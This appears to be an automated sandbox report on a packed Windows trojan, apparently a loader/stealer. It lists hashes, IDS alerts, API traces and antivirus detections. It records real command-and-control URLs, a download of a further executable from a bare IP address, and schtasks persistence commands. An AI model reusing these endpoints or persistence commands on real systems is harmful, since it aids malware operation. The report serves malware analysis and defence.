Summary | ZeroBOX

Services.exe

Malicious Library UPX PE32 PE64 PE File
Category FILE
Machine s1_win7_x6403_us
Started Sept. 30, 2023, 12:52 p.m.
Completed Sept. 30, 2023, 12:54 p.m.
Size 4.0MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 b9a096baebdf8e44368e9724da8e56dd
SHA256 2157d146a890d32c5ba49f31fa1840e5b0d56e4dd0bbf5f8b14cc4e482a47bef
CRC32 DCE92476
ssdeep 98304:OJhDwVgp97vYIP8nq5g88RzpufFdx37e5vQCxt2xWwESu:OYVgLs1qlYp0Ff37exTjJ
Yara
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

IP Address Status Action
104.18.146.235 Active Moloch
104.244.42.129 Active Moloch
104.26.5.15 Active Moloch
149.154.167.99 Active Moloch
164.124.101.2 Active Moloch
171.22.28.226 Active Moloch
172.67.75.166 Active Moloch
193.42.32.118 Active Moloch
213.180.204.24 Active Moloch
34.117.59.81 Active Moloch
5.255.255.70 Active Moloch
62.217.160.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49168 -> 213.180.204.24:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49167 -> 62.217.160.2:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49161 -> 149.154.167.99:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 149.154.167.99:443 -> 192.168.56.103:49163 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 104.26.5.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49173 -> 172.67.75.166:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49164 -> 104.244.42.129:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49170 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49170 -> 34.117.59.81:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49170 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49166 -> 5.255.255.70:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49169 -> 193.42.32.118:80 2045779 ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 171.22.28.226:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49175 -> 171.22.28.226:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 171.22.28.226:80 -> 192.168.56.103:49175 2014819 ET INFO Packed Executable Download Misc activity
TCP 171.22.28.226:80 -> 192.168.56.103:49175 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 171.22.28.226:80 -> 192.168.56.103:49175 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1 192.168.56.103:49167 -> 62.217.160.2:443 | Issuer: C=BE, O=GlobalSign nv-sa, CN=GlobalSign RSA OV SSL CA 2018 | Subject: C=RU, ST=Moscow, L=Moscow, O=VK LLC, CN=*.dzen.ru | Fingerprint: 6a:31:14:29:60:07:c9:c6:17:7b:d1:27:ad:53:57:ec:d8:c1:d8:d2
TLSv1 192.168.56.103:49168 -> 213.180.204.24:443 | Issuer: C=BE, O=GlobalSign nv-sa, CN=GlobalSign RSA OV SSL CA 2018 | Subject: C=RU, ST=Moscow, L=Moscow, O=Yandex LLC, CN=sso.passport.yandex.ru | Fingerprint: 3a:82:43:a9:43:9c:c8:90:01:04:4f:74:1b:6c:cd:4b:9b:19:7d:93
TLSv1 192.168.56.103:49172 -> 104.26.5.15:443 | Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | Fingerprint: 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.103:49173 -> 172.67.75.166:443 | Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | Fingerprint: 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.103:49166 -> 5.255.255.70:443 | Issuer: C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 | Subject: C=RU, ST=Moscow, L=Moscow, O=Yandex LLC, CN=*.xn--d1acpjx3f.xn--p1ai | Fingerprint: e4:ba:b2:7f:bf:93:b8:22:10:26:70:37:9c:03:1a:9d:fb:23:17:24

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "PowerControl HR" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: SUCCESS: The scheduled task "PowerControl LG" has successfully been created.
console_handle: 0x00000007
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .vmp#0
section .vmp#1
section .vmp#2
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
WinHttpCloseHandle-0x3e3 winhttp+0x281e @ 0x7464281e
WinHttpCloseHandle-0x30d winhttp+0x28f4 @ 0x746428f4
WinHttpCloseHandle+0x53 WinHttpSetOption-0x1318 winhttp+0x2c54 @ 0x74642c54
services+0x2ebe5 @ 0x87ebe5
services+0x578e @ 0x85578e
services+0x5739 @ 0x855739
services+0x699a @ 0x85699a
services+0xe696 @ 0x85e696
services+0x38373 @ 0x888373
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 81 79 24 41 41 41 41 0f 85 b4 0d 00 00 83 65 e4
exception.instruction: cmp dword ptr [ecx + 0x24], 0x41414141
exception.exception_code: 0xc0000005
exception.symbol: WinHttpCloseHandle-0x4ae winhttp+0x2753
exception.address: 0x74642753
registers.esp: 4250576
registers.edi: 132
registers.eax: 4250604
registers.ebp: 4250620
registers.edx: 4251780
registers.ebx: 132
registers.esi: 0
registers.ecx: 132
1 0 0

__exception__

stacktrace:
WinHttpCloseHandle-0x3e3 winhttp+0x281e @ 0x7464281e
WinHttpCloseHandle+0x79 WinHttpSetOption-0x12f2 winhttp+0x2c7a @ 0x74642c7a
services+0x2ebe5 @ 0x87ebe5
services+0x578e @ 0x85578e
services+0x5739 @ 0x855739
services+0x699a @ 0x85699a
services+0xe696 @ 0x85e696
services+0x38373 @ 0x888373
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 81 79 24 41 41 41 41 0f 85 b4 0d 00 00 83 65 e4
exception.instruction: cmp dword ptr [ecx + 0x24], 0x41414141
exception.exception_code: 0xc0000005
exception.symbol: WinHttpCloseHandle-0x4ae winhttp+0x2753
exception.address: 0x74642753
registers.esp: 4251680
registers.edi: 132
registers.eax: 4251708
registers.ebp: 4251724
registers.edx: 0
registers.ebx: 132
registers.esi: 0
registers.ecx: 132
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address | suspicious_request GET http://193.42.32.118/api/tracemap.php
suspicious_features POST method with no referer header, Connection to IP address | suspicious_request POST http://193.42.32.118/api/firecom.php
suspicious_features Connection to IP address | suspicious_request HEAD http://171.22.28.226/download/WWW14_64.exe
suspicious_features Connection to IP address | suspicious_request GET http://171.22.28.226/download/WWW14_64.exe
request GET http://193.42.32.118/api/tracemap.php
request POST http://193.42.32.118/api/firecom.php
request GET http://www.maxmind.com/geoip/v2.1/city/me
request HEAD http://171.22.28.226/download/WWW14_64.exe
request GET http://171.22.28.226/download/WWW14_64.exe
request GET https://yandex.ru/
request GET https://dzen.ru/?yredirect=true
request GET https://sso.passport.yandex.ru/push?uuid=ad269c5f-9769-4a8d-84e7-2d5be64d35f7&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue
request GET https://db-ip.com/
request POST https://api.db-ip.com/v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self
request POST http://193.42.32.118/api/firecom.php
request POST https://api.db-ip.com/v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077708280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

domain ipinfo.io
file C:\Users\test22\Documents\WplnwTvomfs_ETjSFxp7elDm.exe
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
file C:\Users\test22\Documents\WplnwTvomfs_ETjSFxp7elDm.exe
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2524
thread_handle: 0x00000560
process_identifier: 2520
current_directory:
filepath:
track: 1
command_line: schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000568
1 1 0

CreateProcessInternalW

thread_identifier: 2600
thread_handle: 0x000005e8
process_identifier: 2596
current_directory:
filepath:
track: 1
command_line: schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000005d8
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd†LËeð" ø0æ,Ǟ@»<h`€€˜¡´à¦, LHƒÐ¤Pzí(€è …÷0 ` vÁ1@@ $à4@À ÈW6@@ üp7@@.vmp#0R{€7@@ T&:@@.idata0:@À.tls@:À.themida`;P:`à.vmp#1¢Ï'°u `.vmp#2€@À.vmp#3è?f@f `h.reloc¤ÐLf@.rsrc¦,à.Nf@@óŸÔƒíÖÞ¡lû³J¦žäNžÄópP²,?±´Ð³ð&¡"=´n”íZ[²¢·íRU´ÒÇÀ´"¿®ªøìȕŸž¡Xðž¦!ËÈÙ®Žr±z0Ÿ4 ´oŸ†:±DáÐ7íR®¯Ò+ž–'´¬È¡p5ÇW²2á*󟚢ȸ̞¤Ì°æ¡‚ŽíX\͞âÌ&Y­S®ÜT®Ö²è̌m°7ŸæÍí˜òÆfB®° Èº¯JÝ LT­–Žížª®¨ÌžFA­¦¿ÇBN­Œ“´@Ù͆´ðz¡þZ±ÒKǂ"ȤȮçÍXu°Æ˜´BœŸø:±ØØ ò™ŸÖ‹±Ñ®š±¶ª®X²¡8Ύݳ m àŸh»ÌDIˬ%®Ø‚Í"ížé ÒĝÞ|Èâÿ³,k±t'´|Н>'ËrðžJ¡$TŸøJ®埼v±ÒkË0ÏËø|Ȍ ÈÆ¥¯L> ÀF®
request_handle: 0x00cc000c
1 1 0
section .vmp#2 (virtual_address 0x00220000, virtual_size 0x003dd340, size_of_data 0x003dd400, entropy 7.904248015521005) description A section with a high entropy has been found
section .rsrc (virtual_address 0x005ff000, virtual_size 0x000335e0, size_of_data 0x0001fc00, entropy 7.417326874929454) description A section with a high entropy has been found
entropy 0.999388229536 description Overall entropy of this PE file is high
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
section .vmp#0 description Section name indicates VMProtect
section .vmp#1 description Section name indicates VMProtect
section .vmp#2 description Section name indicates VMProtect
host 171.22.28.226
host 193.42.32.118
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
Time & API Arguments Status Return Repeated

WSASend

buffer: oke›r¥Ñƒ9µ×ñކ%Qå0ƒ€ôu÷·lDØßcõ>/5 ÀÀÀ À 28*ÿ telegram.org  
socket: 388
0 0

WSASend

buffer: 51e›s$`LX~)Í¢Õ›K{É2Oυ G3nB«  ÿ
socket: 388
0 0

WSASend

buffer: nje›sLuájØôí3׳Wƒñ¸ïþRz ê";B >bh8/5 ÀÀÀ À 28)ÿ twitter.com  
socket: 500
0 0

WSASend

buffer: 51e›sÿ0ÅêˆY£t Ú4œÿhO,J´d<YՇ’?8  ÿ
socket: 500
0 0

WSASend

buffer: lhe›s/hTá¶ÅnS`ÿ2ýÞxJ-qñ{|™>pў/5 ÀÀÀ À 28'ÿ yandex.ru  
socket: 504
0 0

WSASend

buffer: FBAº­fðCÚZ‘ƒƒï:~Ø­ûb¾iy7 i48æÎѧˆTÀƒwÌ¢ÜToé%ƒGŸ©‹ªmž6¡lUÀËÂ=‡20BŸÌª³¥xz~\áÀ_§J`œœ¾ï“â^U—Ö×=oK¿½àÂRH?ƒ´Mý…\
socket: 504
0 0

WSASend

buffer: àŒ—îU®ë…O´åûª,%’(`<Ð%;]£q’j»ßyдœ\ŒÄi,C-éÑ$ŌžQá(|ϳÿ])ÄÐ\9;½óì´(I×®RïøïX‡°Â"3«I»%‹©úMŽÆúÎ \ù¥ï½¦怄 ôµOÉiën,ܧa¸ƒ˜Õ£35©\Ý7A‰-¬>ËÆ­Òü(ÊÁG[hÇ~] õdÑ œjÖ¥†^÷ÃGš(ay:¡¶`1ÿj~ä~£¡ãt=e×F÷>ËRÀ«ªöÒ(ÛO@
socket: 504
0 0

WSASend

buffer: jfe›udçŸ sqßÁð´3’ú:SyzÊ*42$¿vû–M/5 ÀÀÀ À 28%ÿ dzen.ru  
socket: 932
0 0

WSASend

buffer: FBAÝo%6âp“ââÜ/ïqáÖdóøÞµA#÷Í®<æHõ ^'Ñí®Û(­@‹íƒ ¨`ëг>pPõ@jã`0‹õ1°k${†mfàQUû`S’‚Qc”f¶ʪ%§ŸTX1j«3JvL³ߤ/CÑ
socket: 932
0 0

WSASend

buffer: à³[¾|…Ä(ý]Å.¡e(ÿY"ù>—†£7LÚá,JÞҗËC4ÕÝ' 5ÝFu CƒœIô6D?y67\·qЧAƒ¬ÿaú|¸‡ÏñÐÄô[¥4^0:‹Ij¥oU½Ý_ƒJ0ºÐÑ^eäB™ÑOâÀ‰ӛ$×òZ@€/W¿)ò+*£S¨ÿ&Oè—SΒÌŸ*ðÅ%J–óÌ=ˆÉŒÎvh41–½E þèI¿}‹µ\;N)„nÜâïþ>ÇÙ²p.ß¹ÞÕ[3tânÐKîÆúØӚæ<Oë
socket: 932
0 0

WSASend

buffer: yue›vf|î­Ô™*±-ÀNÁù¨H#–HÚlÇ´ˆ¾á/5 ÀÀÀ À 284ÿsso.passport.yandex.ru  
socket: 936
0 0

WSASend

buffer: FBAI”ýá+·$‚˜¾o̾tä€Ý¡.R"`~pŽ«;–)TVü}ÉÙâÅ&é&) ‘A¾ÅIàõª÷ö’0Ø7͘ëÊjI°Öw= Ž®Ñê&) ˆVL'ùÑws—ÿNÊÂ:u‚GaP_`¶T
socket: 936
0 0

WSASend

buffer: @2‘½êã²öÈÅ5×+~Yßùû¸ÖòU~ªú­)ÓZ£œšÃ1NP"¶8¡Jp”˜¬p ýDÝ<¾Š¤ r P CóÒÆCHtªEJ«ÚÕHÖ ©¸ukœ¢E¡ÓÈsiz^ôÌC¾¥EŒöRº»H¸ÁrÏ"8~]_Šwe–tÜÿÝò©Ð-­„B*ò§ê>¡÷›³9¡`Ÿ7Ï S!ϟ€aG•Mv–s͛ʫ䟤~ÙF¥Ñ÷%J:SûlXh+ìùÇ ®°‚GÉ2Óč©õß‘ [ÞÓÉ÷ö&9§Ó;¶0XAkÔ%T`ùŒž >½È¹›Ø÷VË­8sº– ™(I• kB7fÐ܊{P»ƒ`TÔÙ5£èkR²çQêZ¯eø©ŠB OMé׼ژ,»úû“5hpkžhþەçNOæVc[¸ˆóŠ^r_+œÏ"h;6 eÌ­­œ‚UoôƒÏoÚrøˆérµ³Eöͬ;-ö' &åd•+ËëœS§37Ç«¶QZÚ%ÙíƒÌã+‚7§ËóMS°xûôxeäÓrðõE¾günMÓGpc7CÍûk4&+Òu/ØikŸíe·hùz+…ôF#ð¹&Ó¶Õ|UCkÒÙ[~IAOwìÖèy)Y0oC°FÊÓ?Jùø“c8¢ó^ÌÚå{¤=–ì(Ò»ÛZ6%ÕÑca;¯TöcÐdFE@·rЇ¹Füä·é–š0JŽ›Ÿ!|<ÒÞ
socket: 936
0 0

WSASend

buffer:  ײøÄZÎ(†Z. dEÕò ÐȯˆÇÁí;‚xéL
socket: 936
0 0

WSASend

buffer:  BÒ"$fû@f£ Œ`ïNv¿ºÄé9Û*
socket: 936
0 0

WSASend

buffer: GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive Host: 193.42.32.118
socket: 944
0 0

WSASend

buffer: POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 25 Host: 193.42.32.118
socket: 944
0 0

WSASend

buffer: data=m7moirmur7WzsqDt8u8=
socket: 944
0 0

WSASend

buffer: lhe›x@jX~‰’‚›¨À¯ú¸§ûb2*=ëÇž/5 ÀÀÀ À 28'ÿ ipinfo.io  
socket: 996
0 0

WSASend

buffer: 51e›xM_¨‘åW¸w¥Øüã1ˆ/0)7T<Ý,R.ì4a  ÿ
socket: 996
0 0

WSASend

buffer: lhe›xÙÆbC“ìº÷ÉãKè`îݱ‰C›«ÿ4;/5 ÀÀÀ À 28'ÿ db-ip.com  
socket: 1000
0 0

WSASend

buffer: FBA"¤a?V¿vCWÿÍU.‚.8 ½‰£õË(\Y~Z=ZkŠV~ÁádnȬ›@'Kœì–6À«>*ÿ(M‘ý0†º‘ÒÑÊÒ-øÐZuè ¼£En•¶1ÔÙjWúêÁ¢†¸ïº(dÍ[)]Úi˜
socket: 1000
0 0

WSASend

buffer: à1I•áÖˆ†(W*'‹sôpß9?ND^ڑ¢½§Ü-…+÷a‹³·TúÊáN~Ã4¢Þj’¬+Öô¡¥Æa ¦Kj"‘çèüÑGÅ//( Ií2L¶¥‰‚°ï«ýþ4ÇSóðžuW4ˆÚsx(ü®@÷ ª4÷e uóŽ#,’Éoxzˆ«éÃì=6”®G ›•É¡þ‹ê¾õ棩ÿfr/À×Πh]· å`¡OÓÚÁ›Üþg 3[G§ZÔ¨Yw6¿òß4•Oc—x˜ëMôÂQdBÖÕ._å4
socket: 1000
0 0

WSASend

buffer: ple›xòõ=ͤ9ë€zöºàa熎ie<4‹ý)I_/5 ÀÀÀ À 28+ÿ api.db-ip.com  
socket: 1008
0 0

WSASend

buffer: FBAr’H<-èhšÛ„‚¨ªø^VÅ]êÖAF•Oƒót!Hl_{’Ü ‘dÖ(êÖʬ‰qÆöÿP~Â/§¨Yô0eñè`E÷*6•±€!¼¬–”¢™krɦŽšª‚'͂JrúÛQ•ùQJž-r
socket: 1008
0 0

WSASend

buffer: @²"Ô"DÈmÇNažÀ!”¨lû–qé"sú÷ð1…ÄE˜È)OÑå5çÀ¬âš—$¦ rZ”ÅÞäiåzÁÛ«õþT …yõ3NEÉS`pÍg&w˜ðWMDo¦—ŒÄ^R\ûÐò½‚ÿìb»}X¼¥¡<ϼqBñZ•edúë û×åw±¥¶+•í…Ґ|܉‹‹. æ’"Ћ®ÎìÙØFJÅÜ÷H™Øæä# *vFI ØØ­ÇXEÞEVÕ^ŸÄQí‘=g •[>,o¼­x1=6™¼!gùXú ¾‹Sn‡ª&-¿Tî"®¬Á}杅+të—rZ¡¨‚!ÇÜ`£/<,ÍæMl¥©Ð«&÷Žb;8†r6͔wˆjº›oí͎
socket: 1008
0 0

WSASend

buffer: GET /geoip/v2.1/city/me HTTP/1.1 Connection: Keep-Alive Referer: https://www.maxmind.com/en/locate-my-ip-address User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.maxmind.com
socket: 1016
0 0

WSASend

buffer: POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 13 Host: 193.42.32.118
socket: 944
0 0

WSASend

buffer: data=m7molYw=
socket: 944
0 0

WSASend

buffer: POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 69 Host: 193.42.32.118
socket: 944
0 0

WSASend

buffer: data=m7mokLO9uLmukLWyt6C4uem57-W_5L7lvurkvr_uv-657-3ovum97b_s6OrluKA=
socket: 944
0 0

InternetConnectA

username:
service: 3
hostname: 171.22.28.226
internet_handle: 0x00cc0004
flags: 0
password:
port: 80
1 13369352 0

HttpOpenRequestA

connect_handle: 0x00cc0008
http_version:
flags: 2147483648
http_method: HEAD
referer:
path: /download/WWW14_64.exe
1 13369356 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
Bkav W32.AIDetectMalware
MicroWorld-eScan Trojan.GenericKD.69522329
FireEye Generic.mg.b9a096baebdf8e44
McAfee Artemis!B9A096BAEBDF
Malwarebytes Spyware.RedLineStealer
Sangfor Trojan.Win32.Agent.Vmp6
Alibaba Trojan:Win32/VMProtect.9f1fb639
BitDefenderTheta Gen:NN.ZexaF.36738.@J0@aKjs31jO
Cyren W32/ABRisk.NYOS-2315
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/Packed.VMProtect.AU suspicious
APEX Malicious
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.69522329
Avast Win32:DropperX-gen [Drp]
Emsisoft Trojan.GenericKD.69522329 (B)
DrWeb Trojan.Siggen21.33425
TrendMicro Trojan.Win32.PRIVATELOADER.YXDI3Z
McAfee-GW-Edition BehavesLike.Win32.Generic.wc
Trapmine malicious.high.ml.score
Sophos Mal/Generic-S
SentinelOne Static AI - Suspicious PE
Webroot W32.Trojan.Gen
Gridinsoft Malware.Win32.Gen.bot
Microsoft Trojan:Win32/Znyonm
ZoneAlarm UDS:DangerousObject.Multi.Generic
GData Trojan.GenericKD.69522329
Google Detected
VBA32 BScope.TrojanPSW.Coins
MAX malware (ai score=81)
Cylance unsafe
TrendMicro-HouseCall Trojan.Win32.PRIVATELOADER.YXDI3Z
Rising Trojan.Generic@AI.100 (RDML:OleDoKY/5poeqwjOhiYanA)
Fortinet PossibleThreat.MU
AVG Win32:DropperX-gen [Drp]
DeepInstinct MALICIOUS